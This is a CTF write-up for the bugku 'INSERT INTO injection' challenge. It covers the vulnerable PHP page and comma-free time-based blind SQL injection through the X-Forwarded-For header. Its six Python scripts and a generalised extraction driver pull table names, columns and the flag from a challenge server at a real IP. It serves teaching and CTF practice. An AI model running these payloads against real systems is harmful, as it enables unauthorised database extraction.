bugku - Web - INSERT INTO injection (CASE injection technique: time-based blind injection when commas are filtered, plus the time-based injection scripts)
Copyright notice: this article is the author's original work, licensed under CC 4.0 BY-SA. When reposting, include a link to the original and this notice.

Flag format: flag{xxxxxxxxxxxx}
Challenge hint: "Why not just write some Python?"

Source code of the challenge page:
```php
<?php
error_reporting(0);   // no PHP or MySQL errors are ever displayed

// The "client IP" is taken from X-Forwarded-For when present, otherwise REMOTE_ADDR.
// The header is entirely attacker-controlled.
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Only the part before the first comma survives: this is the "comma filter".
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;   // the only output; nothing from the query is ever shown

// The header value is concatenated straight into the SQL string: the injection point.
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);        // return value unchecked, so no error feedback either
```
Clearly the IP is taken from the X-Forwarded-For header (falling back to REMOTE_ADDR) and concatenated straight into the INSERT INTO statement without any escaping, so we control what goes between the quotes in values ('$ip') and can inject through that header. (The proper fix is a prepared statement with a bound parameter; the mysql_* functions used here were removed in PHP 7.)
Error-based injection gives nothing: error_reporting(0) is set and the result of mysql_query() is never checked or printed. Boolean-based blind injection does not work either: the page only echoes the IP before the INSERT runs, so whatever value length(database()) is compared against, the response never changes.
That leaves time-based blind injection. A quick probe of the database name length produced a clear delay, and the length turned out to be 5.
In the code above the IP is split on commas (explode(',', $ip)) and only the first piece is kept, so anything after a comma in our payload is silently dropped. That rules out IF(cond, sleep(4), 1), and also substr(str, pos, 1), since both need commas.
The comma-free equivalents are CASE WHEN cond THEN sleep(4) ELSE 1 END and substr(str FROM pos FOR 1); everything else works exactly like an IF-based time delay. The scripts follow (MySQL keywords are case-insensitive, so lowercase is fine).
1. Get the length of the concatenated table names (we already have the database name length, and database() can stand in for the name, so I did not dump the name itself; if you want to, it is web15)
```python
import requests

url = 'http://123.206.87.240:8002/web15/'

# No comma anywhere in the payload: CASE WHEN replaces IF(), and
# substr(... FROM pos FOR 1) replaces substr(..., pos, 1).
# Comparing with '' is true once pos is past the end of the string.
xff = ("'+(select case when(substr((select group_concat(table_name separator '@') "
       "from information_schema.tables where table_schema=database()) from {0} for 1)='') "
       "then sleep(4) else 1 end) + '1")

for i in range(1, 30):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)   # sleep(4) exceeds the 3 s timeout
    except requests.exceptions.ReadTimeout:
        print(i)   # first position past the end, i.e. length + 1
        break
```
The output is 15, so the concatenated table-name string is 14 characters long (position 15 is the first one past the end).
2. Dump the concatenated table names
```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'   # '@' is the group_concat separator
url = 'http://123.206.87.240:8002/web15/'

# Same separator '@' as in step 1 (the default ',' could not be matched from a
# comma-free payload anyway), so the 14 characters come out as client_ip@flag.
xff = ("'+(select case when(substr((select group_concat(table_name separator '@') "
       "from information_schema.tables where table_schema=database()) from {0} for 1)='{1}') "
       "then sleep(4) else 1 end) + '1")

table = ''
for i in range(1, 15):          # 14 characters, from step 1
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            table += j
            print(table)
            break               # character found, move to the next position
print(table)
```
Result: client_ip@flag
3. Get the length of the concatenated column names of the flag table
```python
import requests

url = 'http://123.206.87.240:8002/web15/'

# Same length probe as step 1, now over the columns of the table found in step 2.
xff = ("'+(select case when(substr((select group_concat(column_name separator '@') "
       "from information_schema.columns where table_name='flag') from {0} for 1)='') "
       "then sleep(4) else 1 end) + '1")

for i in range(1, 30):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)
    except requests.exceptions.ReadTimeout:
        print(i)   # length + 1
        break
```
The column-name string is 4 characters long.
4. Dump the column names
```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
url = 'http://123.206.87.240:8002/web15/'

xff = ("'+(select case when(substr((select group_concat(column_name separator '@') "
       "from information_schema.columns where table_name='flag') from {0} for 1)='{1}') "
       "then sleep(4) else 1 end) + '1")

column = ''
for i in range(1, 5):           # 4 characters, from step 3
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            column += j
            print(column)
            break
print(column)
```
There is only one column, and it is named flag.
5. Get the length of the flag value
```python
import requests

url = 'http://123.206.87.240:8002/web15/'

xff = ("'+(select case when(substr((select flag from flag) from {0} for 1)='') "
       "then sleep(4) else 1 end) + '1")

for i in range(1, 50):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)
        print(i)   # progress: this position still holds a character
    except requests.exceptions.ReadTimeout:
        print(i)   # length + 1
        break
```
The value is 32 characters long.
6. Dump the value (the flag)
```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'

xff = ("'+(select case when(substr((select flag from flag) from {0} for 1)='{1}') "
       "then sleep(4) else 1 end) + '1")

dump = ''
for i in range(1, 33):          # 32 characters, from step 5
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            dump += j
            print(dump)
            break
print(dump)
```
Result: cdbf14c9551d5be5612f7bb5d2867853
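Putting the CASE WHEN / substr ... FROM ... FOR trick and steps 1 to 6 together, here is an added example (my code, not the writeup's scripts) that generalises the six near-identical scripts into one driver. build_payload() emits the comma-free payload for any subquery, position and character; find_length() and extract() drive an oracle that only has to answer "did the server delay?". So that it runs offline, FakeTarget stands in for the vulnerable page, with its answers constructed from the results reported above (client_ip@flag, flag, and the 32-character value), and it rejects any payload that still contains a comma, just as explode() would cut it. http_oracle() is the live variant: it uses urllib rather than requests, and, as a caveat the original scripts lack, it measures the response time against a THRESHOLD (3 s, an assumption) and can re-confirm each hit, because on a jittery link a single slow reply looks like a true condition. The URL in the trailing comment is the one from the writeup.

```python
# Added example (not the writeup's scripts): one driver for steps 1-6.
import re
import socket
import time
import urllib.error
import urllib.request

SLEEP = 4          # seconds sleep() waits when the condition is true
THRESHOLD = 3.0    # assumption: a reply slower than this counts as "true"
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyz_@'

# The three subqueries of steps 1-6. No commas: group_concat uses separator '@'.
TABLES_Q = ("select group_concat(table_name separator '@') from information_schema.tables"
            " where table_schema=database()")
COLUMNS_Q = ("select group_concat(column_name separator '@') from information_schema.columns"
             " where table_name='flag'")
FLAG_Q = "select flag from flag"

def build_payload(subquery, pos, ch):
    """X-Forwarded-For value that tests substr((subquery) FROM pos FOR 1) = ch.

    IF(a,b,c) and substr(s,i,n) need commas, and explode(',', $ip)[0] on the
    server would cut the payload at the first one; CASE WHEN ... END and
    substr(s FROM i FOR n) express the same test without any. The server runs
    insert into client_ip (ip) values (''+(select case when(...) then sleep(4) else 1 end)+'1').
    ch='' probes the length, because substr past the end returns ''.
    """
    if ',' in subquery or ch == ',':
        raise ValueError('payload must stay comma-free')
    cond = f"substr(({subquery}) from {pos} for 1)='{ch}'"
    return f"'+(select case when({cond}) then sleep({SLEEP}) else 1 end)+'1"

def confirmed(oracle, payload, confirm=1):
    """Ask `confirm` times: on a jittery link a single slow reply looks like a hit."""
    return all(oracle(payload) for _ in range(confirm))

def find_length(oracle, subquery, max_len=64, confirm=1):
    """First pos where substr(... FROM pos FOR 1)='' is length+1 (writeup: 15 means 14)."""
    for pos in range(1, max_len + 2):
        if confirmed(oracle, build_payload(subquery, pos, ''), confirm):
            return pos - 1
    raise RuntimeError('value is longer than max_len')

def extract(oracle, subquery, length, charset=CHARSET, confirm=1):
    """Recover `length` characters; leave the inner loop as soon as one matches."""
    out = ''
    for pos in range(1, length + 1):
        for ch in charset:
            if confirmed(oracle, build_payload(subquery, pos, ch), confirm):
                out += ch
                break
        else:
            out += '?'   # not in CHARSET (MySQL's = is case-insensitive here)
    return out

def dump_flag(oracle, confirm=1):
    """Steps 1-6 in one pass: table names, columns of `flag`, then the flag."""
    return tuple(extract(oracle, q, find_length(oracle, q, confirm=confirm), confirm=confirm)
                 for q in (TABLES_Q, COLUMNS_Q, FLAG_Q))

class FakeTarget:
    """Offline stand-in for the vulnerable page; answers as MySQL would for
    substr(value FROM pos FOR 1) = ch. Values are constructed from the writeup's results."""
    VALUES = {TABLES_Q: 'client_ip@flag', COLUMNS_Q: 'flag',
              FLAG_Q: 'cdbf14c9551d5be5612f7bb5d2867853'}
    _TEST = re.compile(r"substr\(\((.*)\) from (\d+) for 1\)='([^']*)'")

    def __call__(self, payload):
        if ',' in payload:
            raise ValueError('comma reached the target: explode() would have cut it')
        sub, pos, ch = self._TEST.search(payload).groups()
        return self.VALUES[sub][int(pos) - 1:int(pos)] == ch   # '' past the end, like MySQL

def http_oracle(url, timeout=SLEEP + 2):
    """Live oracle: send the payload in X-Forwarded-For and time the reply."""
    def oracle(payload):
        req = urllib.request.Request(url, headers={'X-Forwarded-For': payload})
        t0 = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except (socket.timeout, TimeoutError):
            return True                    # sleep() fired, as the writeup's scripts assume
        except urllib.error.URLError as e:
            if isinstance(e.reason, (socket.timeout, TimeoutError)):
                return True
            raise                          # connection errors are not a "true" answer
        return time.monotonic() - t0 >= THRESHOLD
    return oracle

if __name__ == '__main__':
    print(dump_flag(FakeTarget()))
    # Live challenge (URL from the writeup): dump_flag(http_oracle('http://123.206.87.240:8002/web15/'), confirm=2)
```

Against the real target each confirmation doubles the request count for true positions only, since confirmed() stops at the first non-delayed answer; with sleep(4) and a 3 s threshold, a 2-second network spike would otherwise be enough to append a wrong character, which the original scripts would then carry into every later position.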
Last published: 2019-03-31 19:05:28